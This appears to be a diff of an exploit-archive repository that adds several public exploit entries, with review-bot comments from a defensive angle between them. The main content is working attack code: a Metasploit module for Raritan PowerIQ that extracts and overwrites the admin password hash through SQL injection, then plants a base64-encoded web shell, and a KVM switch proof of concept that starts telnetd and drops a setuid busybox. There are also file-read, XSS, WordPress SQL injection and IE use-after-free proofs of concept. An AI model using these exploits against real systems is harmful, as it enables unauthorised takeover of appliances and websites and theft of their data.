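+print "\n"
+"""
+print "--> Creating note...\n"
+ssl_sock.write("<create_note/>")
+note = ssl_sock.read()
+print note
+print "--> Retrieving users list...\n"
+ssl_sock.write("<get_users/>")
+users_list = ssl_sock.read()
+print users_list
+"""
+ssl_sock.close()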
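Review bot: Each reply is taken from a single `ssl_sock.read()`, which on a Python 2 `SSLSocket` returns at most one buffer (1024 bytes by default), so `data` and especially `tasks` can be cut off for any reply longer than that; the reads should loop and accumulate until the reply's closing element arrives (the response element names are not shown on this page, so I cannot quote the exact terminator). The comment above `ssl.wrap_socket` should also say that `CERT_REQUIRED` only validates the chain against `cacert.pem` and that no hostname check is performed, e.g. `# CERT_REQUIRED checks the chain against cacert.pem only; wrap_socket does no hostname check.`, since the pinned self-signed certificate is the only identity check this script makes.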

572
platforms/linux/webapps/34130.rb Executable file

@ -0,0 +1,572 @@
=begin
Raritan PowerIQ suffers from an unauthenticated SQL injection vulnerability
within an endpoint used during initial configuration of the licensing for
the product. This endpoint is still available after the appliance has been
fully configured.
POST /license/records HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://192.168.1.11/license
Content-Length: 15
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sort=id&dir=ASC
Both the 'sort' and 'dir' parameters are vulnerable.
sqlmap identified the following injection points with a total of 1173
HTTP(s) requests:
---
Place: POST
Parameter: sort
Type: boolean-based blind
Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses
Payload: sort=id,(SELECT (CASE WHEN (6357=6357) THEN 1 ELSE 1/(SELECT
0) END))&dir=ASC
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: sort=id; SELECT PG_SLEEP(5)--&dir=ASC
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 time-based blind - Parameter replace
Payload: sort=(SELECT 5480 FROM PG_SLEEP(5))&dir=ASC
Place: POST
Parameter: dir
Type: boolean-based blind
Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses
Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (5274=5274) THEN 1 ELSE
1/(SELECT 0) END))
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: sort=id&dir=ASC; SELECT PG_SLEEP(5)--
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses
Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (1501=1501) THEN (SELECT
1501 FROM PG_SLEEP(5)) ELSE 1/(SELECT 0) END))
---
There may also be a remote command execution vulnerability available to
administrators (or you if you use the stacked injection to update the
hashes).
When saving an NTP server, you can inject a newline (%0a) into the request
in order to save a malformed 'server' stanza in the ntp.conf. When syncing
with NTP, the application passes the first NTP server to the NTP utility
via bash. I was not able to make my malformed NTP server available as the
first in the list, thus was not able to achieve RCE. There may be a way to
do it though that I am unaware of.
Attached is a Metasploit module that I began writing when attempting to
achieve RCE but was never able to. This module will
A) Pull out the current password hash and salt for the 'admin' user and
cache them.
B) Update the admin creeds to be 'admin:Passw0rd!'
C) Set up the malformed NTP server
D) Attempt to sync with NTP.
Because I was not able to achieve RCE via that vector, this module does not
actually pop a shell, so I am sorry about that.
Maybe some PostgreSQL UDF fanciness will be the key.
You may also find the module available here:
https://gist.github.com/brandonprry/01bcd9ec7b8a78ccfc42
Quick module run:
bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
+ -- --=[ 1292 exploits - 702 auxiliary - 202 post ]
+ -- --=[ 332 payloads - 33 encoders - 8 nops ]
msf > use exploit/linux/http/raritan_poweriq_sqli
msf exploit(raritan_poweriq_sqli) > set RHOST 192.168.1.25
RHOST => 192.168.1.25
msf exploit(raritan_poweriq_sqli) > check
[*] Attempting to get banner... This could take several minutes to
fingerprint depending on network speed.
[*] Looks like the length of the banner is: 107
[+] Looks like you are vulnerable.
[+] 192.168.1.25:443 - The target is vulnerable.
msf exploit(raritan_poweriq_sqli) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Checking if vulnerable before attempting exploit.
[*] Attempting to get banner... This could take several minutes to
fingerprint depending on network speed.
[*] Looks like the length of the banner is: 107
[+] Looks like you are vulnerable.
[*] We are vulnerable. Exploiting.
[*] Caching current admin user's password hash and salt.
[*] I can set it back later and they will be none the wiser
[*] Grabbing current hash
[*] Old hash: 84c420e40496930e27301b10930e5966638e0b21
[*] Grabbing current salt
[*] Old salt: 8f3cceddf302b3e2465d6e856e8818c6217d4d04
[*] Resetting admin user credentials to admin:Passw0rd!
[*] Authenticating with admin:Passw0rd!
[*] Setting some stuff up
[*] Sending stager
[*] Triggering stager
[*] Exploit completed, but no session was created.
msf exploit(raritan_poweriq_sqli) >
-- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website
=end
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Raritan PowerIQ Unauthenticated SQL Injection",
'Description' => %q{
This module will exploit an unauthenticated SQL injection in order to gain
a shell on the remote victim. This was tested against PowerIQ v4.1.0.
The 'check' command will attempt to pull the banner of the DBMS (PGSQL) in
order to verify exploitability via boolean injections.
In order to gain remote command execution, multiple vulnerabilities are used.
I use a SQL injection to gain administrative access.
I use a newline injection to save an NTP server I shouldn't be able to save.
By saving this unsanitized NTP server, I can execute commands as 'nginx' with
a request to the server's web application.
You can find a trial ISO at the following link. CentOS-based with PGSQL.
This is what this module was tested against.
http://cdn.raritan.com/download/power-iq/v4.1.0/power-iq-v4.1.0.73.iso
Trial license:
http://d3b2us605ptvk2.cloudfront.net/download/power-iq/RAR_PWIQ5FL_W7rYAAT_13JAN10_1206.lic
If for some reason these links do not work, I "registered" for the trial here:
https://www1.raritan.com/poweriqdownload.html
},
'License' => MSF_LICENSE,
'Author' =>
[
],
'References' =>
[
],
'DefaultOptions' =>
{
'SSL' => true,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => "\x20",
'Compat' =>
{
'RequiredCmd' => 'generic perl python',
}
},
'Targets' =>
[
['Raritan PowerIQ v4.1.0', {}]
],
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
], self.class)
end
#In order to check for exploitability, I will enumerate the banner
#of the DBMS until I have it match a regular expression of /postgresql/i
#
#This isn't optimal (takes a few minutes), but it is reliable. I use
#a boolean injection to enumerate the banner a byte at a time.
def check
#First we make a request that we know should return a 200
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'data' => 'sort=id&dir=ASC'
})
if !res or res.code != 200
return Exploit::CheckCode::Safe
end
#Now we make a request that we know should return a 500
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'data' => "sort=id'&dir=ASC"
})
if !res or res.code != 500
print_error("Probably not vulnerable.")
return Exploit::CheckCode::Safe
end
#If we have made it this far, we believe we are exploitable,
#but now we must prove it. Get the length of the banner before
#attempting to enumerate the banner. I assume the length
#is not greater than 999 characters.
print_status("Attempting to get banner... This could take several minutes to fingerprint depending on network speed.")
length = ''
(1..3).each do |l|
(47..57).each do |i|
str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(LENGTH(VERSION()) AS CHARACTER(10000)),(CHR(32))))::text FROM #{l} FOR 1))>#{i}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'data' => str
})
if res and res.code == 500
length << i.chr
break
end
end
end
if length == ''
return Exploit::CheckCode::Safe
end
print_status("Looks like the length of the banner is: " + length)
#We have the length, now let's get the banner until it matches
#the regular expression /postgresql/i
banner = ''
(1..length.to_i).each do |c|
(32..126).each do |b|
str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32))))::text FROM #{c} FOR 1))>#{b}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest',
},
'data' => str
})
if res and res.code == 500
banner << b.chr
if c%10 == 0
vprint_status("#{((c.to_f/length.to_f)*100).to_s}% done: " + banner)
end
if banner =~ /postgresql/i
print_good("Looks like you are vulnerable.")
vprint_good("Current banner: " + banner)
return Exploit::CheckCode::Vulnerable
end
break
end
end
end
#If we reach here, we never matched our regex, which means we must
#not be vulnerable.
return Exploit::CheckCode::Safe
end
def exploit
print_status("Checking if vulnerable before attempting exploit.")
if check == Exploit::CheckCode::Vulnerable
print_status("We are vulnerable. Exploiting.")
print_status("Caching current admin user's password hash and salt.")
print_status("I can set it back later and they will be none the wiser")
print_status("Grabbing current hash")
old_crypted_password = get_admin_column_value("crypted_password")
print_status("Old hash: " + old_crypted_password)
print_status("Grabbing current salt")
old_salt = get_admin_column_value("salt")
print_status("Old salt: " + old_salt)
print_status("Resetting admin user credentials to admin:Passw0rd!")
headers = {
'X-Requested-With' => 'XMLHttpRequest'
}
salt_inj = ';UPDATE users set salt = (CHR(56)||CHR(102)||CHR(51)||CHR(99)||CHR(99)||CHR(101)||CHR(100)||CHR(100)||CHR(102)||CHR(51)||CHR(48)||CHR(50)||CHR(98)||CHR(51)||CHR(101)||CHR(50)||CHR(52)||CHR(54)||CHR(53)||CHR(100)||CHR(54)||CHR(101)||CHR(56)||CHR(53)||CHR(54)||CHR(101)||CHR(56)||CHR(56)||CHR(49)||CHR(56)||CHR(99)||CHR(54)||CHR(50)||CHR(49)||CHR(55)||CHR(100)||CHR(52)||CHR(100)||CHR(48)||CHR(52)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--'
hash_inj = ';UPDATE users set crypted_password=(CHR(56)||CHR(52)||CHR(99)||CHR(52)||CHR(50)||CHR(48)||CHR(101)||CHR(52)||CHR(48)||CHR(52)||CHR(57)||CHR(54)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(50)||CHR(55)||CHR(51)||CHR(48)||CHR(49)||CHR(98)||CHR(49)||CHR(48)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(53)||CHR(57)||CHR(54)||CHR(54)||CHR(54)||CHR(51)||CHR(56)||CHR(101)||CHR(48)||CHR(98)||CHR(50)||CHR(49)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--'
post = {
'sort' => 'id' + salt_inj,
'dir' => 'ASC'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => headers,
'vars_post' => post
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way")
end
post['sort'] = 'id' + hash_inj
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => headers,
'vars_post' => post
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way")
end
print_status("Authenticating with admin:Passw0rd!")
post = {
'login' => 'admin',
'password' => 'Passw0rd!'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'login', 'login'),
'method' => 'POST',
'vars_post' => post
})
if !res or res.code != 302
fail_with("Authentication failed.")
end
cookie = res.get_cookies
print_status("Setting some stuff up")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers.json'),
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
servers = JSON.parse(res.body)
post = {
'_method' => '_delete',
'hosts' => servers["servers"].to_json
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'),
'method' => 'DELETE',
'vars_post' => post,
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
print_status("Sending stager")
stage = '`echo${IFS}Ye2xhc3MgRmRzYUNvbnRyb2xsZXIgPCBBY3Rpb25Db250cm9sbGVyOjpCYXNlCiAgZGVmIGluZGV4'
stage << 'CiAgICByZXQgPSBgI3twYXJhbXNbOmNtZF19YAogICAgcmVkaXJlY3RfdG8gcmV0CiAgZW5kCmVu'
stage << 'ZCAKIAoK|base64${IFS}--decode>/opt/raritan/polaris/rails/main/app/controllers/rewq_controller.rb`'
post = {
'host[server]' => "www.abc.com\x0aserver " + stage,
'host[ip_type]' => '0'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers'),
'method' => 'POST',
'vars_post' => post,
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200 or res.body =~ /false/
fail_with("Server did not respond in an expected way.")
end
post = {
'_method' => '_delete',
'hosts' => '[{"server":"www.abc.com", "ip_type":0}]'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'),
'method' => 'DELETE',
'vars_post' => post,
'headers' => headers,
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'application_settings', 'edit'),
'cookie' => cookie
})
if !res or res.code != 200
fail_with("Server did not respond in an expected way.")
end
res.body =~ /boxLabel: "Enable NTP",\n checked: (true|false),\n listeners/m
checked = $1
if checked == "true"
post = {
'_method' => 'put',
'rails_options[time_zone]' => 'UTC',
'date_time' => '',
'rails_options[ntp_enabled]' => 'off'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'),
'vars_post' => post,
'method' => 'POST',
'cookie' => cookie
})
if !res or res.code != 302
fail_with("Server did not respond in an expected way")
end
end
post = {
'_method' => 'put',
'rails_options[time_zone]' => 'UTC',
'date_time' => '',
'rails_options[ntp_enabled]' => 'on'
}
print_status("Triggering stager")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie,
})
end
end
def get_admin_column_value(column)
ret = ''
(1..40).each do |i|
[*('0'..'9'),*('a'..'f')].each do |c|
inj = "(SELECT (CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(#{column} AS CHARACTER(10000)),(CHR(32))) FROM users WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)) OFFSET 0 LIMIT 1)::text FROM #{i} FOR 1))>#{c.ord}) THEN 1 ELSE 1/(SELECT 0) END))"
post = {
'sort' => 'id,' + inj,
'dir' => 'ASC'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'license', 'records'),
'method' => 'POST',
'headers' => {
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => post
})
if !res
fail_with("Server did not respond in an expected way")
end
if res.code == 500
vprint_status("Got character '"+c+"' for index " + i.to_s)
ret << c
break
end
end
end
return ret
end
end

128
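--- a/platforms/php/remote/34132.txt
+++ b/platforms/php/remote/34132.txt
@@ -0,0 +1,128 @@
+*Product description*
+The IBM 1754 GCM family provides KVM over IP and serial console management
+technology in a single appliance. Versions v1.20.0.22575 and prior are
+vulnerables.
+Note that this vulnerability is also present in some DELL and probably
+other vendors of this rebranded KVM. I contacted Dell but no response has
+been received.
+*1. Remote code execution *
+CVEID: CVE-2014-2085
+Description: Improperly sanitized input may allow a remote authenticated
+attacker to perform remote code execution on the GCM KVM switch.
+PoC of this vulnerability:
+#!/usr/bin/python"""
+Exploit for Avocent KVM switch v1.20.0.22575.
+Remote code execution with privilege elevation.
+SessionId (avctSessionId) is neccesary for this to work, so you need a
+valid user. Default user is "Admin" with blank password.
+After running exploit, connect using telnet to device with user target
+(pass: target) then do "/tmp/su -" to gain root (password "root")
+alex.a.bravo@gmail.com
+"""
+from StringIO import StringIO
+import pycurl
+import os
+sessid = "1111111111"
+target = "192.168.0.10"
+durl = "https://" + target + "/systest.php?lpres=;%20/usr/
+sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%
+206755%20/tmp/su%20;"
+storage = StringIO()
+c = pycurl.Curl()
+c.setopt(c.URL, durl)
+c.setopt(c.SSL_VERIFYPEER,0)
+c.setopt(c.SSL_VERIFYHOST,0)
+c.setopt(c.WRITEFUNCTION,storage.write)
+c.setopt(c.COOKIE,'avctSessionId=' + sessid)
+try:
+print "[*] Sending GET to " + target + " with session id " + sessid
++ "..."
+c.perform()
+c.close()
+except:
+print ""
+finally:
+print "[*] Done"
+print "[*] Trying telnet..."
+print "[*] Login as target/target, then do /tmp/su - and enter password
+\"root\""
+os.system("telnet " + target)
+*2. Arbitrary file read *
+CVEID: CVE-2014-3081
+Description: This device allows any authenticated user to read arbitrary
+files. Files can be anywhere on the target.
+PoC of this vulnerability:
+#!/usr/bin/python
+"""
+This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
+read arbitrary files on device.
+SessionId (avctSessionId) is neccesary for this to work, so you need a
+valid user.
+alex.a.bravo@gmail.com
+"""
+from StringIO import StringIO
+import pycurl
+sessid = "1111111111"
+target = "192.168.0.10"
+file = "/etc/IBM_user.dat"
+durl = "https://" + target + "/prodtest.php?engage=video_
+bits&display=results&filename=" + file
+storage = StringIO()
+c = pycurl.Curl()
+c.setopt(c.URL, durl)
+c.setopt(c.SSL_VERIFYPEER,0)
+c.setopt(c.SSL_VERIFYHOST,0)
+c.setopt(c.WRITEFUNCTION,storage.write)
+c.setopt(c.COOKIE,'avctSessionId=' + sessid)
+try:
+c.perform()
+c.close()
+except:
+print ""
+content = storage.getvalue()
+print content.replace("<td>","").replace("</td>","")
+*3. Cross site scripting non-persistent*
+CVEID: CVE-2014-3080
+Description: System is vulnerable to cross-site scripting, caused by
+improper validation of user-supplied input. A remote attacker could exploit
+this vulnerability using a specially-crafted URL to execute script in a
+victim's Web browser within the security context of the hosting Web site,
+once the URL is clicked. An attacker could use this vulnerability to steal
+the victim's cookie-based authentication credentials.
+Examples:
+http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
+https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
+*Vendor Response:*
+IBM release 1.20.20.23447 firmware
+*Timeline:*
+2014-05-20 - Vendor (PSIRT) notified
+2014-05-21 - Vendor assigns internal ID
+2014-07-16 - Patch Disclosed
+2014-07-17 - Vulnerability disclosed
+*External Information:*
+Info about the vulnerability (spanish):
+http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
+IBM Security Bulletin:
+http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983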
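Review bot: The product description at the top gives the affected range ('v1.20.0.22575 and prior') but never names the remediation, which is buried under 'Vendor Response' as the 1.20.20.23447 firmware; a sentence such as `Fixed in firmware 1.20.20.23447 (see IBM bulletin MIGR-5095983)` belongs next to the affected-version statement. Both PoCs require a valid avctSessionId, and the first one notes that the default 'Admin' account ships with a blank password, so that default credential is the precondition a defender should list as its own hardening item. The request paths the scripts use, `systest.php?lpres=` and `prodtest.php?...&filename=`, are also the access-log signatures to alert on while appliances remain unpatched.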

52
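--- a/platforms/php/webapps/34105.txt
+++ b/platforms/php/webapps/34105.txt
@@ -0,0 +1,52 @@
+######################
+# Exploit Title : Wordpress Gallery Objects 0.4 SQL Injection
+# Exploit Author : Claudio Viviani
+# Vendor Homepage : http://galleryobjects.com/
+# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip
+# Dork Google: inurl:/admin-ajax.php?action=go_view_object
+# Date : 2014-07-18
+# Tested on : Windows 7 / Mozilla Firefox
+Windows 7 / sqlmap (0.8-1)
+Linux / Mozilla Firefox
+Linux / sqlmap 1.0-dev-5b2ded0
+######################
+Poc via Browser:
+http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
+sqlmap:
+sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
+---
+Place: GET
+Parameter: viewid
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
+---
+#####################
+Discovered By : Claudio Viviani
+http://www.homelab.it
+info@homelab.it
+https://www.facebook.com/homelabit
+https://twitter.com/homelabit
+https://plus.google.com/+HomelabIt1/
+#####################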
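Review bot: The advisory records no vendor contact or fixed release, and the only version information is the tested plugin build (0.4), so readers cannot tell whether updating fixes the injection or the plugin must be removed; a `# Vendor notified:` / `# Fixed in:` pair in the header would close that gap. The sqlmap output pins a boolean-based blind injection to the `viewid` parameter of `admin-ajax.php?action=go_view_object`, and since the browser PoC shows no login step the action is presumably reachable without authentication, which makes that query string the pattern to match in a WAF rule or access-log review.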

25
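--- a/platforms/php/webapps/34124.txt
+++ b/platforms/php/webapps/34124.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day)
+# Google Dork: Index of:"/wp-backup-plus"
+# Date: 19/07/2014
+# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec
+# Vendor Homepage: http://wpbackupplus.com/
+# Version:
+# Tested on: win7 32 Bit & Linux Kali
+[+] Description
+wpbackupplus make the backup .zip files and not protected
+[+] Exploit:
+For download all the website files
+http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/
+For download the Database backup
+http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp
+[+] POC :
+http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/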
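Review bot: The `# Version:` field is empty and there is no disclosure status, so the advisory does not say which wpbackupplus releases leave `wp-content/uploads/wp-backup-plus/` listable or whether the vendor was told; the header should carry the tested plugin version and a vendor-contact line. The issue as described is directory indexing plus unprotected backup archives under the web root, so the mitigations a reader would want spelled out are disabling directory indexes for that path, keeping backups outside the web root, and checking access logs for requests to the `temp` subdirectory.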

113
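--- a/platforms/win32/dos/34010.html
+++ b/platforms/win32/dos/34010.html
@@ -0,0 +1,113 @@
+<!--
+Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
+Product: Internet Explorer
+Vulnerable version: 9,10
+Date: 8.07.2014
+Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
+Vendor Homepage: http://www.microsoft.com/
+Tested on: Window 7 SP1 x86 IE 9,10
+CVE : unknown
+-->
+<html>
+<body>
+<form id="form1">
+<input id="input1" type="text" value="">
+</form>
+<script>
+loaded = false ;
+function func() {
+if (loaded) {
+document.body.innerHTML = "" ; // free CFormElement
+}
+}
+input1 = document.getElementById("input1") ;
+input1.onclick = func ;
+loaded = true ;
+input1.click(); // Call DoClick function
+</script>
+</body>
+</html>
+<!--
+Vulnerability details
+MSHTML!CInput::DoClick
+66943670 8bcf mov ecx,edi
+66943672 ff751c push dword ptr [ebp+1Ch]
+66943675 ff7518 push dword ptr [ebp+18h]
+66943678 ff7514 push dword ptr [ebp+14h]
+6694367b ff7510 push dword ptr [ebp+10h]
+6694367e ff750c push dword ptr [ebp+0Ch]
+66943681 ff7508 push dword ptr [ebp+8] <---- esi = CFormElement
+66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
+66943689 85db test ebx,ebx
+6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695)
+6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
+66943691 836668fe and dword ptr [esi+68h],0FFFFFFFEh ; memory corruption, write to freed memory
+MSHTML!CInput::DoClick+0x60:
+66943681 ff7508 push dword ptr [ebp+8] ss:0023:023ec994=00000000
+0:005> p
+eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
+eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
+MSHTML!CInput::DoClick+0x63:
+66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf)
+0:005> dds esi l1
+0034cd20 6661ead8 MSHTML!CFormElement::`vftable'
+0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
+Entry User Heap Segment Size PrevSize Unused Flags
+-----------------------------------------------------------------------------
+0034cd18 0034cd20 00270000 002fcee8 78 - c LFH;busy
+0:005> p
+eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
+eip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+MSHTML!CInput::DoClick+0x68:
+66943689 85db test ebx,ebx
+0:005> dds esi l1
+0034cd20 6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
+0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
+Entry User Heap Segment Size PrevSize Unused Flags
+-----------------------------------------------------------------------------
+0034cd18 0034cd20 00270000 002fcee8 78 - 0 LFH;free
+0:005> p
+eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
+eip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
+MSHTML!CInput::DoClick+0x6a:
+6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695) [br=0]
+0:005> p
+eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
+eip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
+MSHTML!CInput::DoClick+0x6c:
+6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001
+-->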
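Review bot: The header says `CVE : unknown` while the title attributes the bug to MS14-035, so the fix reference is only implicit; the header should cite the bulletin (and the CVE it assigns to this CFormElement issue once identified) so readers know which IE 9/10 updates close it, since the generic vendor homepage gives no remediation pointer. The trace does substantiate the use-after-free: `!heap -x esi` reports the CFormElement entry as `LFH;busy` before `CElement::DoClick` and `LFH;free` after, and the two `and dword ptr [esi+...]` instructions then write into that freed block. The comment block should also state that the silent run is expected, presumably because the freed LFH chunk stays mapped, so a triager does not discard the PoC when it produces no crash without allocator instrumentation.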

55
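--- a/platforms/windows/dos/34129.txt
+++ b/platforms/windows/dos/34129.txt
@@ -0,0 +1,55 @@
+# Exploit Title: World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt)
+# Date: 21 Jul 2014
+# Exploit Author: Alireza Chegini (@nimaarek)
+# Vendor Homepage: http://us.battle.net/wow/
+# Version: 3.3.5a
+# Tested on: Win7
+Output:
+--WoWError [CrashDUmp] :
+World of WarCraft (build 12340)
+Exe: D:\Wow\Wow.exe
+Time: Jul 21, 2014 6:10:08.243 PM
+User: nimaarek
+Computer: NIMAAREK-L
+------------------------------------------------------------------------------
+This application has encountered a critical error:
+ERROR #132 (0x85100084) Fatal Exception
+Program: D:\Wow\Wow.exe
+Exception: 0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77
+--Windbg result:
+0:020> g
+ModLoad: 6c670000 6c6a0000 C:\Windows\SysWOW64\wdmaud.drv
+ModLoad: 6d3a0000 6d3a4000 C:\Windows\SysWOW64\ksuser.dll
+ModLoad: 6c660000 6c667000 C:\Windows\SysWOW64\AVRT.dll
+ModLoad: 6c610000 6c618000 C:\Windows\SysWOW64\msacm32.drv
+ModLoad: 6c600000 6c607000 C:\Windows\SysWOW64\midimap.dll
+ModLoad: 71e50000 71e66000 C:\Windows\SysWOW64\CRYPTSP.dll
+ModLoad: 71e10000 71e4b000 C:\Windows\SysWOW64\rsaenh.dll
+(3a8.470): Stack overflow - code c00000fd (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for Wow.exe -
+eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000
+eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+Wow+0xbb77:
+0040bb77 8500 test dword ptr [eax],eax ds:002b:02af2000=00000000
+==============================================================================
+Poc :
+%systemroot%\Wow\WTF\Account\[AccountName]\macros-cache.txt
+MACRO 1 "Decursive" INV_Misc_QuestionMark
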